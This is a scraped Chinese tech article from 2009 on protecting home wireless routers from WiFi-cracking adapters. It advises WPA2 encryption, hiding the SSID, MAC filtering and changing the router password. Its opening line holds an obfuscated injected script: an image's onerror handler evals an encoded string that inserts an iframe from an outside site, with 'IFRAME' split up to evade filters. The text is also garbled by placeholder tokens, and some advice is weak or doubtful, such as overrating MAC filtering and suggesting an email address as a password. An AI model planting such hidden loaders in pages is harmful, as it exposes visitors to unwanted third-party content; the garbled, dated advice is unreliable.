0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//qdsm.net/links/zh_160_600.html%20frameBorder%3D0%20width%3D160%20scrolling%3Dno%20height%3D600%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml1%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))"> |
某日,本站IT水平稀烂的Klaus无精打采的来到编辑部。众人问之:难道是昨天力不从心?Klaus垂头丧气道:“别提了,刚上几分钟就不行了,最近这段时间老这样。”如果你也遭遇Klaus的问题,那很可能是家里的无线路由器被超热门的蹭网卡蹭了(想歪的请面壁)。蹭网的人只要悄悄的进村,不打枪打开BT,你无论是语聊还是玩WoW或者Web Galgame,都会上一下就断。如果你的宽带线路没有包月,迎接你的当然还有天价账单。
在许多蹭网卡的介绍中都会吹嘘自己无坚不摧,无网不破,无妹不把。但事实上即便是功率再大的蹭网卡,面对设置严密家用无线路由器都将束手无策。在蹭网卡火爆横行的今天,我们就一起来调戏JS们,斩断网络盗用黑手,让家里的无线路由器无缝可蹭。
知己知彼 百蹭百败——蹭网卡是什么?
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" title="蹭网滚一边 家用无线路由器反盗用攻略" border=0 alt="蹭网滚一边 家用无线路由器反盗用攻略" src="http://www.evolife.cn/wp-content/uploads/2009/09/200952312625470-thumb.jpg" width=500 height=294>
只要在Google或者百度中输入蹭网卡,你就能找到大量相关资讯。这些长得极像USB无线网卡的东西,披上了典型的山寨外衣,纷纷标榜自己是卡王、卡圣、卡霸、卡巴斯基。但实际上,所谓蹭网卡不过是普通无线网卡加大功率、附带无线网络加密xx软件的改装版而已。由于蹭网卡大多功率巨大、附带各种非法软件,所以绝不可能堂而皇之的在正规电脑城、B2C网站销售。
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" title=蹭网卡 border=0 alt=蹭网卡 src="http://www.evolife.cn/wp-content/uploads/2009/09/200952312623993-thumb.jpg" width=455 height=341>
相对于普通无线网卡30mW~100mW的功率相比,蹭网卡大多有着200mW~500mW的功率。功率越大,当然能搜索到更多的无线网络热点,但同样会干扰其他如蓝牙耳机、无绳电话等设备。与此同时,500mW的功率还可能对人类健康造成影响。除了功率巨大,蹭网卡大多提供加长大型天线和被称作 BT3的无线网络xx工具。加长型天线就是图片中的小黑棍子,至于BT3那可就是蹭网卡的“精髓”所在。
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" title=BackTrack3操作系统 border=0 alt=BackTrack3操作系统 src="http://www.evolife.cn/wp-content/uploads/2009/09/backtrack20320final20screen20-thumb.png" width=456 height=341>
所谓BT3实际上是基于Linux内核的黑客专用操作系统Back Track 3的简称。这个修改版Linux操作系统集成了大量黑客攻击与渗透工具。由于Linux开源的特性,所有人都能在网上免费下载到Back Track操作系统。如今{zx1}的BackTrack 4操作系统已经进入预发行阶段,相信过不了多久蹭网卡们就会宣称自己蹭网软件升级到了BT4,再度无网不破。
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" title=200952312625723 border=0 alt=200952312625723 src="http://www.evolife.cn/wp-content/uploads/2009/09/200952312625723-thumb.jpg" width=455 height=341>
你千万别以为能在Windows下实施无线网络xx。所有蹭网卡都要求用户由BackTrack操作系统启动,然后运行SnoopWEP,然后对加密的无线网络进行密码穷举与试探攻击,攻击成功后获得加密密码,再重启到Windows下通过普通无线网卡连接使用。为什么软件名叫SnoopWEP?那是因为WEP是无线网络最初级也是安全性最差的加密标准,存在大量漏洞能迅速攻破。如果你换用WPA或者WPA2加密方式,配上复杂的密码,那蹭网卡就xx无机可乘。这也是我们的“防守”策略。
蹭网滚一边 {dy}式——选择WPA、WPA2无线加密方式
安全性:★★★★
复杂度:★
今天即便是{zpy}的54mbps 802.11g无线路由器,都能提供WEP、WPA、WPA2三种无线加密方式。其中WEP加密方式由于年代久远,存在大量漏洞,而且无法由用户自行指定密码。而WPA默认采用TKIP(动态密钥完整性协议)加密,有效堵住了WEP加密方式能够被穷举密码的漏洞。而WPA2无线加密,更是引入了AES加密,在密码强度足够的情况下坚不可摧。
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" title=选择WPA、WPA2无线加密方式 border=0 alt=选择WPA、WPA2无线加密方式 src="http://www.evolife.cn/wp-content/uploads/2009/09/snap5009-thumb.jpg" width=500 height=176>
值得注意的是,问世较晚的WPA2无线加密方式只有支持802.11g或以上的无线网卡才能支持,Windows XP SP2操作系统也必须打上KB893357补丁,才能支持WPA2加密标准。我们建议所有条件允许的读者选用WPA2-PSK AES加密方式来杜绝蹭网。
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" title=选择WPA、WPA2无线加密方式 border=0 alt=选择WPA、WPA2无线加密方式 src="http://www.evolife.cn/wp-content/uploads/2009/09/snap5000-thumb.jpg" width=300 height=419>
如果你的无线网络中还有人使用802.11b(11M)无线网卡,或不支持WPA2加密标准,WPA-PSK TKIP加密也是个不错的选择——记住千万别选WEP,由于天生的漏洞,WEP加密在BT3xx面前几乎没有什么抵抗力。
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" title=选择WPA、WPA2无线加密方式 border=0 alt=选择WPA、WPA2无线加密方式 src="http://www.evolife.cn/wp-content/uploads/2009/09/snap5008-thumb.jpg" width=500 height=239>
所有的加密方式都离不开密码,选择好记且不容易被猜到的密码也至关重要。如果你把无线网络的网络名称和密码设置成一样的,或者用123456当作密码,那设置什么加密方式都是白搭。WPA、WPA2加密标准允许你使用最多63个字符当作密码。我们推荐所有用户密码都采用标点符号与字母混合的方式,例如邮箱地址“xxx@evolife.cn”就是个很不错的密码。
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" title=选择WPA、WPA2无线加密方式 border=0 alt=选择WPA、WPA2无线加密方式 src="http://www.evolife.cn/wp-content/uploads/2009/09/snap5010-thumb.jpg" width=500 height=243>
除此以外,短语短句也好记又强大,例如“icanwin.””getoutplease!””chengwanggunyibian”等等。对于蹭网卡而言,要穷举WPA、WPA2 AES方式加密,而且密码类似于邮箱这样的混合字符串,几乎是个不可能的任务。
蹭网滚一边 第二式——关闭SSID广播
安全性:★★
复杂度:★★
我们要联入无线网络的时候,大多需要进行扫描,然后找到某个无线接入点进行连接。蹭网卡用户也需要先扫描附近的无线网络,才能确定入侵蹭网目标,这也正是为什么蹭网卡大多功率巨大,天线巨大的原因——如果一开始就让蹭网卡搜索不到你的网络,那显然就不会有进一步的密码xx动作。
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" title=关闭SSID广播 border=0 alt=关闭SSID广播 src="http://www.evolife.cn/wp-content/uploads/2009/09/snap5001-thumb.jpg" width=451 height=212>
绝大部分家用路由器,都有关闭SSID广播功能。在某些路由器上,将这个功能称作隐藏无线网络ID,或者隐藏无线网络选项。一旦打开此功能,我们的无线网络将无法被扫描到。如果要添加设备,即必须知道网络的SSID名称,然后手动加入。这样虽然能从很大程度上避免蹭网,但也会给自己造成不便。
蹭网滚一边 第三式——MAC地址过滤
安全性:★★★★★
复杂度:★★★★
什么是MAC地址?所谓MAC(Media Access Control, 介质访问控制)MAC地址是烧录网卡内部的{wy}标志符。这类似于网卡的身份证号,每个网卡都有{wy}的MAC地址,所有网络设备都以MAC地址来进行相互识别。在许多无线路由器中,大多会提供MAC地址过滤功能。通过MAC地址过滤,我们可以让在白名单上的网卡接入无线网络,而白名单以外的网卡,即便你知道 SSID和密码,也照样无法登陆。
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" title=MAC地址过滤 border=0 alt=MAC地址过滤 src="http://www.evolife.cn/wp-content/uploads/2009/09/snap5007-thumb.jpg" width=500 height=273>
要设置MAC地址过滤,我们首先需要得知自己电脑网卡的MAC地址。对于Windows操作系统而言,我们可以点击开始—附件—运行。在运行框内输入CMD,进入命令行模式。然后输入ipconfig /all。在弹出来的大量信息中,对应网卡下方的物理地址,就是你的网卡的MAC地址。我们记下该地址,然后把这个地址填入路由器白名单中,就能正常访问网络。
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" title=MAC地址过滤 border=0 alt=MAC地址过滤 src="http://www.evolife.cn/wp-content/uploads/2009/09/snap5005-thumb.jpg" width=500 height=213>
如果你需要接入的WIFI手机,那在手机软件的属性中也能查到WIFI网卡的MAC地址。如果是Wii、PS3等游戏机,MAC地址可以在游戏机底部标签和包装盒上找到。
蹭网滚一边 第四式——修改路由器登陆密码
安全性:★★★
复杂度:★
许多人习惯把路由器买回家后,一直使用用户名Admin、密码Admin这样的默认设定。这实际上是整个网络安全{zd0}的漏洞。因为一旦得知你的路由器用户名和密码,就能随意更改上述一切设置。假如你之前使用WEP加密已经被蹭网,又使用默认路由器登陆密码,就很有可能被他人偷偷修改路由器设置,让蹭网用户自由出入。
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" title=修改路由器登陆密码 border=0 alt=修改路由器登陆密码 src="http://www.evolife.cn/wp-content/uploads/2009/09/snap5011-thumb.jpg" width=500 height=248>
我们建议所有读者都为路由器设置一个有足够强度的密码,这个密码还千万不要和WPA/WPA2无线加密密码一样,以免防线被一次攻破。
结语:四大招式 蹭网真没戏
借助WEP无线加密方式自身的漏洞,蹭网卡俨然成为了一个巨大的产业。然而WEP加密早已经被业界所淘汰,无线网络制造商也推荐用户使用WPA、 WPA2加密以杜绝漏洞。在合理的WPA密码、关闭SSID广播加上MAC地址过滤下,即便你家周围有几十万蹭网者,也照样拿你没办法。
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" title="四大招式 蹭网真没戏" border=0 alt="四大招式 蹭网真没戏" src="http://www.evolife.cn/wp-content/uploads/2009/09/200952312625956-thumb.jpg" width=500 height=413>
对于准备购买蹭网卡的用户,也千万别被JS花言巧语所蒙蔽——所谓无坚不摧的蹭网卡,不过是利用老旧加密技术的漏洞下手而已,面对主流加密方式和看过本文的用户,是xx没有任何几乎蹭网的。